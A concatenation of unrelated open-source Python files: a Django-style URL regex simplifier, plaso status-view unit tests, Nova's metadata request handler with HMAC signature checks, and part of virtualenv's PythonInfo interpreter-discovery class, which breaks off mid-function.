views.append((p.callback, base + p.regex.pattern,
namespace, p.name))
except ViewDoesNotExist:
continue
else:
raise TypeError(_("%s does not appear to be a urlpattern object") % p)
return views
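# For example (illustrative), given a urlconf containing
#   url(r'^articles/(?P<year>[0-9]{4})/$', views.year_archive, name='archive')
# this returns [(views.year_archive, '^articles/(?P<year>[0-9]{4})/$', None, 'archive')].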
named_group_matcher = re.compile(r'\(\?P(<\w+>).+?\)')
non_named_group_matcher = re.compile(r'\(.*?\)')
def simplify_regex(pattern):
"""
Clean up urlpattern regexes into something somewhat readable by Mere Humans:
turns something like "^(?P<sport_slug>\w+)/athletes/(?P<athlete_slug>\w+)/$"
into "<sport_slug>/athletes/<athlete_slug>/"
"""
# handle named groups first
pattern = named_group_matcher.sub(lambda m: m.group(1), pattern)
# handle non-named groups
pattern = non_named_group_matcher.sub("<var>", pattern)
# clean up any outstanding regex-y characters.
pattern = pattern.replace('^', '').replace('$', '').replace('?', '').replace('//', '/').replace('\\', '')
if not pattern.startswith('/'):
pattern = '/' + pattern
return pattern
|
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the status view."""
from __future__ import unicode_literals
import unittest
try:
import mock # pylint: disable=import-error
except ImportError:
from unittest import mock
import sys
from dfvfs.lib import definitions as dfvfs_definitions
import plaso
from plaso.cli import status_view
from plaso.engine import processing_status
from tests.cli import test_lib
class StatusViewTest(test_lib.CLIToolTestCase):
"""Tests for the status view."""
# pylint: disable=protected-access
def _MockTime(self):
"""Mock function to simulate time.time()
Returns:
int: stored time via self._mocked_time"""
return self._mocked_time
def setUp(self):
"""Makes preparations before running an individual test."""
self.mock_time = mock.patch(
'plaso.cli.status_view.time.time', self._MockTime)
self._mocked_time = 0
self.mock_time.start()
def tearDown(self):
"""Cleans up after running an individual test."""
self.mock_time.stop()
def _CheckOutput(self, output, expected_output):
"""Compares the output against the expected output.
The actual processing time is ignored, since it can vary.
Args:
output (str): tool output.
expected_output (list[str]): expected tool output.
"""
output = output.split('\n')
self.assertEqual(output[:4], expected_output[:4])
self.assertTrue(output[4].startswith('Processing time\t\t: '))
self.assertEqual(output[5:], expected_output[5:])
# TODO: add tests for _ClearScreen
# TODO: add tests for _FormatAnalysisStatusTableRow
# TODO: add tests for _FormatExtractionStatusTableRow
# TODO: add tests for _FormatSizeInUnitsOf1024
# TODO: add tests for _PrintAnalysisStatusHeader
# TODO: add tests for _PrintAnalysisStatusUpdateLinear
# TODO: add tests for _PrintAnalysisStatusUpdateWindow
# TODO: add tests for _PrintEventsStatus
def testPrintExtractionStatusUpdateLinear(self):
"""Tests the PrintExtractionStatusUpdateLinear function."""
output_writer = test_lib.TestOutputWriter()
test_view = status_view.StatusView(output_writer, 'test_tool')
test_view.SetSourceInformation(
'/test/source/path', dfvfs_definitions.SOURCE_TYPE_DIRECTORY)
process_status = processing_status.ProcessingStatus()
process_status.UpdateForemanStatus(
'f_identifier', 'f_status', 123, 0,
'f_test_file', 1, 29, 3, 456, 5, 6, 9, 10, 7, 8)
test_view._PrintExtractionStatusUpdateLinear(process_status)
expected_output = (
'Processing time: 00:00:00\n'
'f_identifier (PID: 123) status: f_status, events produced: 456, '
'file: f_test_file\n'
'\n')
output = output_writer.ReadOutput()
self.assertEqual(output, expected_output)
process_status.UpdateWorkerStatus(
'w_identifier', 'w_status', 123, 0,
'w_test_file', 1, 2, 3, 4, 5, 6, 9, 10, 7, 8)
test_view._PrintExtractionStatusUpdateLinear(process_status)
expected_output = (
'Processing time: 00:00:00\n'
'f_identifier (PID: 123) status: f_status, events produced: 456, '
'file: f_test_file\n'
'w_identifier (PID: 123) status: w_status, events produced: 4, '
'file: w_test_file\n'
'\n')
output = output_writer.ReadOutput()
self.assertEqual(output, expected_output)
def testPrintExtractionStatusUpdateWindow(self):
"""Tests the _PrintExtractionStatusUpdateWindow function."""
output_writer = test_lib.TestOutputWriter()
test_view = status_view.StatusView(output_writer, 'test_tool')
test_view.SetSourceInformation(
'/test/source/path', dfvfs_definitions.SOURCE_TYPE_DIRECTORY)
process_status = processing_status.ProcessingStatus()
process_status.UpdateForemanStatus(
'f_identifier', 'f_status', 123, 0,
'f_test_file', 1, 29, 3, 456, 5, 6, 9, 10, 7, 8)
test_view._PrintExtractionStatusUpdateWindow(process_status)
table_header = (
'Identifier '
'PID '
'Status '
'Memory '
'Sources '
'Events '
'File')
if not sys.platform.startswith('win'):
table_header = '\x1b[1m{0:s}\x1b[0m'.format(table_header)
expected_output = [
'plaso - test_tool version {0:s}'.format(plaso.__version__),
'',
'Source path\t\t: /test/source/path',
'Source type\t\t: directory',
'Processing time\t\t: 00:00:00',
'',
table_header,
('f_identifier '
'123 '
'f_status '
'0 B '
'29 (29) '
'456 (456) '
'f_test_file'),
'',
'']
output = output_writer.ReadOutput()
self._CheckOutput(output, expected_output)
process_status.UpdateWorkerStatus(
'w_identifier', 'w_status', 123, 0,
'w_test_file', 1, 2, 3, 4, 5, 6, 9, 10, 7, 8)
test_view._PrintExtractionStatusUpdateWindow(process_status)
expected_output = [
'plaso - test_tool version {0:s}'.format(plaso.__version__),
'',
'Source path\t\t: /test/source/path',
'Source type\t\t: directory',
'Processing time\t\t: 00:00:00',
'',
table_header,
('f_identifier '
'123 '
'f_status '
'0 B '
'29 (29) '
'456 (456) '
'f_test_file'),
('w_identifier '
'123 '
'w_status '
'0 B '
'2 (2) '
'4 (4) '
'w_test_file'),
'',
'']
output = output_writer.ReadOutput()
self._CheckOutput(output, expected_output)
def testFormatProcessingTime(self):
"""Tests the _FormatProcessingTime function."""
output_writer = test_lib.TestOutputWriter()
process_status = processing_status.ProcessingStatus()
test_view = status_view.StatusView(output_writer, 'test_tool')
test_view.SetSourceInformation(
'/test/source/path', dfvfs_definitions.SOURCE_TYPE_DIRECTORY)
process_status.start_time = 0
processing_time = test_view._FormatProcessingTime(process_status)
self.assertEqual(processing_time, '00:00:00')
    self._mocked_time = 12 * 60 * 60 + 31 * 60 + 15
processing_time = test_view._FormatProcessingTime(process_status)
self.assertEqual(processing_time, '12:31:15')
self._mocked_time = 24 * 60 * 60
processing_time = test_view._FormatProcessingTime(process_status)
self.assertEqual(processing_time, '1 day, 00:00:00')
self._mocked_time = 5 * 24 * 60 * 60 + 5 * 60 * 60 + 61
processing_time = test_view._FormatProcessingTime(process_status)
self.assertEqual(processing_time, '5 days, 05:01:01')
# TODO: add tests for _PrintTasksStatus
# TODO: add tests for GetAnalysisStatusUpdateCallback
# TODO: add tests for GetExtractionStatusUpdateCallback
# TODO: add tests for PrintAnalysisReportsDetails
def testPrintExtractionStatusHeader(self):
"""Tests the PrintExtractionStatusHeader function."""
output_writer = test_lib.TestOutputWriter()
test_view = status_view.StatusView(output_writer, 'test_tool')
test_view.SetSourceInformation(
'/test/source/path', dfvfs_definitions.SOURCE_TYPE_DIRECTORY)
test_view.PrintExtractionStatusHeader(None)
# TODO: add tests for PrintExtractionSummary
# TODO: add tests for SetMode
# TODO: add tests for SetSourceInformation
# TODO: add tests for SetStorageFileInformation
if __name__ == '__main__':
unittest.main()
|
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Metadata request handler."""
import hashlib
import hmac
import os
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import secretutils as secutils
import six
import webob.dec
import webob.exc
from nova.api.metadata import base
from nova import cache_utils
import nova.conf
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.network.neutronv2 import api as neutronapi
from nova import wsgi
CONF = nova.conf.CONF
LOG = logging.getLogger(__name__)
class MetadataRequestHandler(wsgi.Application):
"""Serve metadata."""
def __init__(self):
self._cache = cache_utils.get_client(
expiration_time=CONF.api.metadata_cache_expiration)
if (CONF.neutron.service_metadata_proxy and
not CONF.neutron.metadata_proxy_shared_secret):
LOG.warning("metadata_proxy_shared_secret is not configured, "
"the metadata information returned by the proxy "
"cannot be trusted")
def get_metadata_by_remote_address(self, address):
if not address:
raise exception.FixedIpNotFoundForAddress(address=address)
cache_key = 'metadata-%s' % address
data = self._cache.get(cache_key)
if data:
LOG.debug("Using cached metadata for %s", address)
return data
try:
data = base.get_metadata_by_address(address)
except exception.NotFound:
return None
if CONF.api.metadata_cache_expiration > 0:
self._cache.set(cache_key, data)
return data
def get_metadata_by_instance_id(self, instance_id, address):
cache_key = 'metadata-%s' % instance_id
data = self._cache.get(cache_key)
if data:
LOG.debug("Using cached metadata for instance %s", instance_id)
return data
try:
data = base.get_metadata_by_instance_id(instance_id, address)
except exception.NotFound:
return None
if CONF.api.metadata_cache_expiration > 0:
self._cache.set(cache_key, data)
return data
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
if os.path.normpath(req.path_info) == "/":
resp = base.ec2_md_print(base.VERSIONS + ["latest"])
req.response.body = encodeutils.to_utf8(resp)
req.response.content_type = base.MIME_TYPE_TEXT_PLAIN
return req.response
if CONF.neutron.service_metadata_proxy:
if req.headers.get('X-Metadata-Provider'):
meta_data = self._handle_instance_id_request_from_lb(req)
else:
meta_data = self._handle_instance_id_request(req)
else:
if req.headers.get('X-Instance-ID'):
LOG.warning(
"X-Instance-ID present in request headers. The "
"'service_metadata_proxy' option must be "
"enabled to process this header.")
meta_data = self._handle_remote_ip_request(req)
if meta_data is None:
raise webob.exc.HTTPNotFound()
try:
data = meta_data.lookup(req.path_info)
except base.InvalidMetadataPath:
raise webob.exc.HTTPNotFound()
if callable(data):
return data(req, meta_data)
resp = base.ec2_md_print(data)
req.response.body = encodeutils.to_utf8(resp)
req.response.content_type = meta_data.get_mimetype()
return req.response
def _handle_remote_ip_request(self, req):
remote_address = req.remote_addr
if CONF.api.use_forwarded_for:
remote_address = req.headers.get('X-Forwarded-For', remote_address)
try:
meta_data = self.get_metadata_by_remote_address(remote_address)
except Exception:
LOG.exception('Failed to get metadata for IP %s',
remote_address)
msg = _('An unknown error has occurred. '
'Please try your request again.')
raise webob.exc.HTTPInternalServerError(
explanation=six.text_type(msg))
if meta_data is None:
LOG.error('Failed to get metadata for IP %s: no metadata',
remote_address)
return meta_data
def _handle_instance_id_request(self, req):
instance_id = req.headers.get('X-Instance-ID')
tenant_id = req.headers.get('X-Tenant-ID')
signature = req.headers.get('X-Instance-ID-Signature')
remote_address = req.headers.get('X-Forwarded-For')
        # Ensure that each required header is present, and present only once
if instance_id is None:
msg = _('X-Instance-ID header is missing from request.')
elif signature is None:
msg = _('X-Instance-ID-Signature header is missing from request.')
elif tenant_id is None:
msg = _('X-Tenant-ID header is missing from request.')
elif not isinstance(instance_id, six.string_types):
msg = _('Multiple X-Instance-ID headers found within request.')
elif not isinstance(tenant_id, six.string_types):
msg = _('Multiple X-Tenant-ID headers found within request.')
else:
msg = None
if msg:
raise webob.exc.HTTPBadRequest(explanation=msg)
self._validate_shared_secret(instance_id, signature,
remote_address)
return self._get_meta_by_instance_id(instance_id, tenant_id,
remote_address)
def _get_instance_id_from_lb(self, provider_id, instance_address):
# We use admin context, admin=True to lookup the
# inter-Edge network port
context = nova_context.get_admin_context()
neutron = neutronapi.get_client(context, admin=True)
        # Tenant and instance ids are found as follows:
# X-Metadata-Provider contains id of the metadata provider, and since
# overlapping networks cannot be connected to the same metadata
# provider, the combo of tenant's instance IP and the metadata
# provider has to be unique.
#
# The networks which are connected to the metadata provider are
# retrieved in the 1st call to neutron.list_subnets()
# In the 2nd call we read the ports which belong to any of the
# networks retrieved above, and have the X-Forwarded-For IP address.
# This combination has to be unique as explained above, and we can
# read the instance_id, tenant_id from that port entry.
# Retrieve networks which are connected to metadata provider
md_subnets = neutron.list_subnets(
context,
advanced_service_providers=[provider_id],
fields=['network_id'])
md_networks = [subnet['network_id']
for subnet in md_subnets['subnets']]
try:
# Retrieve the instance data from the instance's port
instance_data = neutron.list_ports(
context,
fixed_ips='ip_address=' + instance_address,
network_id=md_networks,
fields=['device_id', 'tenant_id'])['ports'][0]
except Exception as e:
LOG.error('Failed to get instance id for metadata '
'request, provider %(provider)s '
'networks %(networks)s '
'requester %(requester)s. Error: %(error)s',
{'provider': provider_id,
'networks': md_networks,
'requester': instance_address,
'error': e})
msg = _('An unknown error has occurred. '
'Please try your request again.')
raise webob.exc.HTTPBadRequest(explanation=msg)
instance_id = instance_data['device_id']
tenant_id = instance_data['tenant_id']
        # instance_data values are unicode, which cache_utils doesn't accept,
        # so convert instance_id to str
if isinstance(instance_id, six.text_type):
instance_id = instance_id.encode('utf-8')
return instance_id, tenant_id
def _handle_instance_id_request_from_lb(self, req):
remote_address = req.headers.get('X-Forwarded-For')
if remote_address is None:
msg = _('X-Forwarded-For is missing from request.')
raise webob.exc.HTTPBadRequest(explanation=msg)
provider_id = req.headers.get('X-Metadata-Provider')
if provider_id is None:
msg = _('X-Metadata-Provider is missing from request.')
raise webob.exc.HTTPBadRequest(explanation=msg)
instance_address = remote_address.split(',')[0]
# If authentication token is set, authenticate
if CONF.neutron.metadata_proxy_shared_secret:
signature = req.headers.get('X-Metadata-Provider-Signature')
self._validate_shared_secret(provider_id, signature,
instance_address)
instance_id, tenant_id = self._get_instance_id_from_lb(
provider_id, instance_address)
return self._get_meta_by_instance_id(instance_id, tenant_id,
instance_address)
def _validate_shared_secret(self, requestor_id, signature,
requestor_address):
expected_signature = hmac.new(
encodeutils.to_utf8(CONF.neutron.metadata_proxy_shared_secret),
encodeutils.to_utf8(requestor_id),
hashlib.sha256).hexdigest()
if not secutils.constant_time_compare(expected_signature, signature):
if requestor_id:
LOG.warning('X-Instance-ID-Signature: %(signature)s does '
'not match the expected value: '
'%(expected_signature)s for id: '
'%(requestor_id)s. Request From: '
'%(requestor_address)s',
{'signature': signature,
'expected_signature': expected_signature,
'requestor_id': requestor_id,
'requestor_address': requestor_address})
msg = _('Invalid proxy request signature.')
raise webob.exc.HTTPForbidden(explanation=msg)
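    # Illustrative client-side counterpart (the secret and instance id below
    # are made-up values): a proxy produces a matching signature with
    #
    #   import hashlib, hmac
    #   sig = hmac.new(b'shared-secret', b'i-abc123', hashlib.sha256).hexdigest()
    #
    # and sends it as the X-Instance-ID-Signature (or
    # X-Metadata-Provider-Signature) header.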
def _get_meta_by_instance_id(self, instance_id, tenant_id, remote_address):
try:
meta_data = self.get_metadata_by_instance_id(instance_id,
remote_address)
except Exception:
LOG.exception('Failed to get metadata for instance id: %s',
instance_id)
msg = _('An unknown error has occurred. '
'Please try your request again.')
raise webob.exc.HTTPInternalServerError(
explanation=six.text_type(msg))
if meta_data is None:
LOG.error('Failed to get metadata for instance id: %s',
instance_id)
elif meta_data.instance.project_id != tenant_id:
LOG.warning("Tenant_id %(tenant_id)s does not match tenant_id "
"of instance %(instance_id)s.",
{'tenant_id': tenant_id, 'instance_id': instance_id})
# causes a 404 to be raised
meta_data = None
return meta_data
|
|
"""
The PythonInfo contains information about a concrete instance of a Python interpreter
Note: this file is also used to query target interpreters, so can only use standard library methods
"""
from __future__ import absolute_import, print_function
import json
import logging
import os
import platform
import re
import sys
import sysconfig
import warnings
from collections import OrderedDict, namedtuple
from string import digits
VersionInfo = namedtuple("VersionInfo", ["major", "minor", "micro", "releaselevel", "serial"])
def _get_path_extensions():
return list(OrderedDict.fromkeys([""] + os.environ.get("PATHEXT", "").lower().split(os.pathsep)))
EXTENSIONS = _get_path_extensions()
_CONF_VAR_RE = re.compile(r"\{\w+\}")
class PythonInfo(object):
"""Contains information for a Python interpreter"""
def __init__(self):
def u(v):
return v.decode("utf-8") if isinstance(v, bytes) else v
def abs_path(v):
return None if v is None else os.path.abspath(v) # unroll relative elements from path (e.g. ..)
# qualifies the python
self.platform = u(sys.platform)
self.implementation = u(platform.python_implementation())
if self.implementation == "PyPy":
self.pypy_version_info = tuple(u(i) for i in sys.pypy_version_info)
        # sys.version_info is a plain tuple on older interpreters and a struct sequence later; unify to our own namedtuple
self.version_info = VersionInfo(*list(u(i) for i in sys.version_info))
self.architecture = 64 if sys.maxsize > 2 ** 32 else 32
self.version = u(sys.version)
self.os = u(os.name)
# information about the prefix - determines python home
self.prefix = u(abs_path(getattr(sys, "prefix", None))) # prefix we think
self.base_prefix = u(abs_path(getattr(sys, "base_prefix", None))) # venv
self.real_prefix = u(abs_path(getattr(sys, "real_prefix", None))) # old virtualenv
# information about the exec prefix - dynamic stdlib modules
self.base_exec_prefix = u(abs_path(getattr(sys, "base_exec_prefix", None)))
self.exec_prefix = u(abs_path(getattr(sys, "exec_prefix", None)))
self.executable = u(abs_path(sys.executable)) # the executable we were invoked via
self.original_executable = u(abs_path(self.executable)) # the executable as known by the interpreter
        self.system_executable = self._fast_get_system_executable() # the executable we are based off of (if available)
try:
__import__("venv")
has = True
except ImportError:
has = False
self.has_venv = has
self.path = [u(i) for i in sys.path]
self.file_system_encoding = u(sys.getfilesystemencoding())
self.stdout_encoding = u(getattr(sys.stdout, "encoding", None))
if "venv" in sysconfig.get_scheme_names():
self.sysconfig_scheme = "venv"
self.sysconfig_paths = {
u(i): u(sysconfig.get_path(i, expand=False, scheme="venv")) for i in sysconfig.get_path_names()
}
            # we cannot use distutils at all if the "venv" scheme exists; distutils doesn't know about it
self.distutils_install = {}
else:
self.sysconfig_scheme = None
self.sysconfig_paths = {u(i): u(sysconfig.get_path(i, expand=False)) for i in sysconfig.get_path_names()}
self.distutils_install = {u(k): u(v) for k, v in self._distutils_install().items()}
# https://bugs.python.org/issue22199
makefile = getattr(sysconfig, "get_makefile_filename", getattr(sysconfig, "_get_makefile_filename", None))
self.sysconfig = {
u(k): u(v)
for k, v in [
# a list of content to store from sysconfig
("makefile_filename", makefile()),
]
if k is not None
}
config_var_keys = set()
for element in self.sysconfig_paths.values():
for k in _CONF_VAR_RE.findall(element):
config_var_keys.add(u(k[1:-1]))
config_var_keys.add("PYTHONFRAMEWORK")
self.sysconfig_vars = {u(i): u(sysconfig.get_config_var(i) or "") for i in config_var_keys}
if self.implementation == "PyPy" and sys.version_info.major == 2:
self.sysconfig_vars[u"implementation_lower"] = u"python"
confs = {k: (self.system_prefix if v.startswith(self.prefix) else v) for k, v in self.sysconfig_vars.items()}
self.system_stdlib = self.sysconfig_path("stdlib", confs)
self.system_stdlib_platform = self.sysconfig_path("platstdlib", confs)
self.max_size = getattr(sys, "maxsize", getattr(sys, "maxint", None))
self._creators = None
def _fast_get_system_executable(self):
"""Try to get the system executable by just looking at properties"""
if self.real_prefix or (
self.base_prefix is not None and self.base_prefix != self.prefix
): # if this is a virtual environment
if self.real_prefix is None:
base_executable = getattr(sys, "_base_executable", None) # some platforms may set this to help us
if base_executable is not None: # use the saved system executable if present
if sys.executable != base_executable: # we know we're in a virtual environment, cannot be us
return base_executable
return None # in this case we just can't tell easily without poking around FS and calling them, bail
# if we're not in a virtual environment, this is already a system python, so return the original executable
# note we must choose the original and not the pure executable as shim scripts might throw us off
return self.original_executable
def install_path(self, key):
result = self.distutils_install.get(key)
if result is None: # use sysconfig if sysconfig_scheme is set or distutils is unavailable
# set prefixes to empty => result is relative from cwd
prefixes = self.prefix, self.exec_prefix, self.base_prefix, self.base_exec_prefix
config_var = {k: "" if v in prefixes else v for k, v in self.sysconfig_vars.items()}
result = self.sysconfig_path(key, config_var=config_var).lstrip(os.sep)
return result
@staticmethod
def _distutils_install():
# use distutils primarily because that's what pip does
# https://github.com/pypa/pip/blob/main/src/pip/_internal/locations.py#L95
# note here we don't import Distribution directly to allow setuptools to patch it
with warnings.catch_warnings(): # disable warning for PEP-632
warnings.simplefilter("ignore")
try:
from distutils import dist
from distutils.command.install import SCHEME_KEYS
except ImportError: # if removed or not installed ignore
return {}
d = dist.Distribution({"script_args": "--no-user-cfg"}) # conf files not parsed so they do not hijack paths
if hasattr(sys, "_framework"):
sys._framework = None # disable macOS static paths for framework
with warnings.catch_warnings(): # disable warning for PEP-632
warnings.simplefilter("ignore")
i = d.get_command_obj("install", create=True)
i.prefix = os.sep # paths generated are relative to prefix that contains the path sep, this makes it relative
i.finalize_options()
result = {key: (getattr(i, "install_{}".format(key))[1:]).lstrip(os.sep) for key in SCHEME_KEYS}
return result
@property
def version_str(self):
return ".".join(str(i) for i in self.version_info[0:3])
@property
def version_release_str(self):
return ".".join(str(i) for i in self.version_info[0:2])
@property
def python_name(self):
version_info = self.version_info
return "python{}.{}".format(version_info.major, version_info.minor)
@property
def is_old_virtualenv(self):
return self.real_prefix is not None
@property
def is_venv(self):
return self.base_prefix is not None and self.version_info.major == 3
def sysconfig_path(self, key, config_var=None, sep=os.sep):
pattern = self.sysconfig_paths[key]
if config_var is None:
config_var = self.sysconfig_vars
else:
base = {k: v for k, v in self.sysconfig_vars.items()}
base.update(config_var)
config_var = base
return pattern.format(**config_var).replace(u"/", sep)
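    # For example (illustrative): a stored pattern of
    # "{base}/lib/python{py_version_short}" formatted with
    # {"base": "/usr", "py_version_short": "3.9"} yields "/usr/lib/python3.9",
    # with "/" then swapped for the platform's path separator.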
def creators(self, refresh=False):
if self._creators is None or refresh is True:
from ..run.plugin.creators import CreatorSelector
self._creators = CreatorSelector.for_interpreter(self)
return self._creators
@property
def system_include(self):
path = self.sysconfig_path(
"include",
{k: (self.system_prefix if v.startswith(self.prefix) else v) for k, v in self.sysconfig_vars.items()},
)
if not os.path.exists(path): # some broken packaging don't respect the sysconfig, fallback to distutils path
# the pattern include the distribution name too at the end, remove that via the parent call
fallback = os.path.join(self.prefix, os.path.dirname(self.install_path("headers")))
if os.path.exists(fallback):
path = fallback
return path
@property
def system_prefix(self):
return self.real_prefix or self.base_prefix or self.prefix
@property
def system_exec_prefix(self):
return self.real_prefix or self.base_exec_prefix or self.exec_prefix
def __unicode__(self):
content = repr(self)
        if sys.version_info[0] == 2:
content = content.decode("utf-8")
return content
def __repr__(self):
return "{}({!r})".format(
self.__class__.__name__,
{k: v for k, v in self.__dict__.items() if not k.startswith("_")},
)
def __str__(self):
content = "{}({})".format(
self.__class__.__name__,
", ".join(
"{}={}".format(k, v)
for k, v in (
("spec", self.spec),
(
"system"
if self.system_executable is not None and self.system_executable != self.executable
else None,
self.system_executable,
),
(
"original"
if (
self.original_executable != self.system_executable
and self.original_executable != self.executable
)
else None,
self.original_executable,
),
("exe", self.executable),
("platform", self.platform),
("version", repr(self.version)),
("encoding_fs_io", "{}-{}".format(self.file_system_encoding, self.stdout_encoding)),
)
if k is not None
),
)
return content
@property
def spec(self):
return "{}{}-{}".format(self.implementation, ".".join(str(i) for i in self.version_info), self.architecture)
@classmethod
def clear_cache(cls, app_data):
# this method is not used by itself, so here and called functions can import stuff locally
from .cached_py_info import clear
clear(app_data)
cls._cache_exe_discovery.clear()
def satisfies(self, spec, impl_must_match):
"""check if a given specification can be satisfied by the this python interpreter instance"""
if spec.path:
if self.executable == os.path.abspath(spec.path):
                return True # if the path is our own executable path we're done
if not spec.is_abs:
# if path set, and is not our original executable name, this does not match
basename = os.path.basename(self.original_executable)
spec_path = spec.path
if sys.platform == "win32":
basename, suffix = os.path.splitext(basename)
if spec_path.endswith(suffix):
spec_path = spec_path[: -len(suffix)]
if basename != spec_path:
return False
if impl_must_match:
if spec.implementation is not None and spec.implementation.lower() != self.implementation.lower():
return False
if spec.architecture is not None and spec.architecture != self.architecture:
return False
for our, req in zip(self.version_info[0:3], (spec.major, spec.minor, spec.micro)):
if req is not None and our is not None and our != req:
return False
return True
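    # For example (illustrative): a spec requesting major=3, minor=9 with no
    # micro constraint is satisfied by a CPython 3.9.7 instance, while with
    # impl_must_match=True a spec whose implementation is "pypy" is rejected
    # by a CPython interpreter even when every version component matches.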
_current_system = None
_current = None
@classmethod
def current(cls, app_data=None):
"""
This locates the current host interpreter information. This might be different than what we run into in case
the host python has been upgraded from underneath us.
"""
if cls._current is None:
cls._current = cls.from_exe(sys.executable, app_data, raise_on_error=True, resolve_to_host=False)
return cls._current
@classmethod
def current_system(cls, app_data=None):
"""
This locates the current host interpreter information. This might be different than what we run into in case
the host python has been upgraded from underneath us.
"""
if cls._current_system is None:
cls._current_system = cls.from_exe(sys.executable, app_data, raise_on_error=True, resolve_to_host=True)
return cls._current_system
def _to_json(self):
# don't save calculated paths, as these are non primitive types
return json.dumps(self._to_dict(), indent=2)
def _to_dict(self):
data = {var: (getattr(self, var) if var not in ("_creators",) else None) for var in vars(self)}
# noinspection PyProtectedMember
data["version_info"] = data["version_info"]._asdict() # namedtuple to dictionary
return data
@classmethod
def from_exe(cls, exe, app_data=None, raise_on_error=True, ignore_cache=False, resolve_to_host=True, env=None):
"""Given a path to an executable get the python information"""
# this method is not used by itself, so here and called functions can import stuff locally
from .cached_py_info import from_exe
env = os.environ if env is None else env
proposed = from_exe(cls, app_data, exe, env=env, raise_on_error=raise_on_error, ignore_cache=ignore_cache)
# noinspection PyProtectedMember
if isinstance(proposed, PythonInfo) and resolve_to_host:
try:
proposed = proposed._resolve_to_system(app_data, proposed)
except Exception as exception:
if raise_on_error:
raise exception
logging.info("ignore %s due cannot resolve system due to %r", proposed.original_executable, exception)
proposed = None
return proposed
@classmethod
def _from_json(cls, payload):
# the dictionary unroll here is to protect against pypy bug of interpreter crashing
raw = json.loads(payload)
return cls._from_dict({k: v for k, v in raw.items()})
@classmethod
def _from_dict(cls, data):
data["version_info"] = VersionInfo(**data["version_info"]) # restore this to a named tuple structure
result = cls()
result.__dict__ = {k: v for k, v in data.items()}
return result
@classmethod
def _resolve_to_system(cls, app_data, target):
start_executable = target.executable
prefixes = OrderedDict()
while target.system_executable is None:
prefix = target.real_prefix or target.base_prefix or target.prefix
if prefix in prefixes:
if len(prefixes) == 1:
# if we're linking back to ourselves accept ourselves with a WARNING
logging.info("%r links back to itself via prefixes", target)
target.system_executable = target.executable
break
for at, (p, t) in enumerate(prefixes.items(), start=1):
logging.error("%d: prefix=%s, info=%r", at, p, t)
logging.error("%d: prefix=%s, info=%r", len(prefixes) + 1, prefix, target)
raise RuntimeError("prefixes are causing a circle {}".format("|".join(prefixes.keys())))
prefixes[prefix] = target
target = target.discover_exe(app_data, prefix=prefix, exact=False)
if target.executable != target.system_executable:
target = cls.from_exe(target.system_executable, app_data)
target.executable = start_executable
return target
_cache_exe_discovery = {}
def discover_exe(self, app_data, prefix, exact=True, env=None):
key = prefix, exact
if key in self._cache_exe_discovery and prefix:
logging.debug("discover exe from cache %s - exact %s: %r", prefix, exact, self._cache_exe_discovery[key])
return self._cache_exe_discovery[key]
logging.debug("discover exe for %s in %s", self, prefix)
# we don't know explicitly here, do some guess work - our executable name should tell
possible_names = self._find_possible_exe_names()
possible_folders = self._find_possible_folders(prefix)
discovered = []
env = os.environ if env is None else env
for folder in possible_folders:
for name in possible_names:
info = self._check_exe(app_data, folder, name, exact, discovered, env)
if info is not None:
self._cache_exe_discovery[key] = info
return info
if exact is False and discovered:
info = self._select_most_likely(discovered, self)
folders = os.pathsep.join(possible_folders)
self._cache_exe_discovery[key] = info
logging.debug("no exact match found, chosen most similar of %s within base folders %s", info, folders)
return info
msg = "failed to detect {} in {}".format("|".join(possible_names), os.pathsep.join(possible_folders))
raise RuntimeError(msg)
def _check_exe(self, app_data, folder, name, exact, discovered, env):
exe_path = os.path.join(folder, name)
if not os.path.exists(exe_path):
return None
info = self.from_exe(exe_path, app_data, resolve_to_host=False, raise_on_error=False, env=env)
if info is None: # ignore if for some reason we can't query
return None
for item in ["implementation", "architecture", "version_info"]:
found = getattr(info, item)
searched = getattr(self, item)
if found != searched:
if item == "version_info":
found, searched = ".".join(str(i) for i in found), ".".join(str(i) for i in searched)
executable = info.executable
logging.debug("refused interpreter %s because %s differs %s != %s", executable, item, found, searched)
if exact is False:
discovered.append(info)
break
else:
return info
return None
@staticmethod
def _select_most_likely(discovered, target):
        # no exact match was found, so relax the requirements; this accommodates system package
        # upgrades that can cause a mismatch (when the copy strategy was used for the host python)
def sort_by(info):
            # we need to set up a priority of traits, most significant first:
            # implementation, major, minor, architecture, micro, releaselevel, serial
matches = [
info.implementation == target.implementation,
info.version_info.major == target.version_info.major,
info.version_info.minor == target.version_info.minor,
info.architecture == target.architecture,
info.version_info.micro == target.version_info.micro,
info.version_info.releaselevel == target.version_info.releaselevel,
info.version_info.serial == target.version_info.serial,
]
priority = sum((1 << pos if match else 0) for pos, match in enumerate(reversed(matches)))
return priority
sorted_discovered = sorted(discovered, key=sort_by, reverse=True) # sort by priority in decreasing order
most_likely = sorted_discovered[0]
return most_likely
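    # To illustrate the weighting in _select_most_likely: with seven traits, a match on the
    # most significant one (implementation) contributes 1 << 6 = 64, so a candidate matching
    # only the implementation outranks one matching all six remaining traits (at most
    # 32 + 16 + 8 + 4 + 2 + 1 = 63). These figures are derived from the code above.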
def _find_possible_folders(self, inside_folder):
candidate_folder = OrderedDict()
executables = OrderedDict()
executables[os.path.realpath(self.executable)] = None
executables[self.executable] = None
executables[os.path.realpath(self.original_executable)] = None
executables[self.original_executable] = None
for exe in executables.keys():
base = os.path.dirname(exe)
            # follow the path pattern of the current executable
if base.startswith(self.prefix):
relative = base[len(self.prefix) :]
candidate_folder["{}{}".format(inside_folder, relative)] = None
# or at root level
candidate_folder[inside_folder] = None
return list(i for i in candidate_folder.keys() if os.path.exists(i))
def _find_possible_exe_names(self):
name_candidate = OrderedDict()
for name in self._possible_base():
for at in (3, 2, 1, 0):
version = ".".join(str(i) for i in self.version_info[:at])
for arch in ["-{}".format(self.architecture), ""]:
for ext in EXTENSIONS:
candidate = "{}{}{}{}".format(name, version, arch, ext)
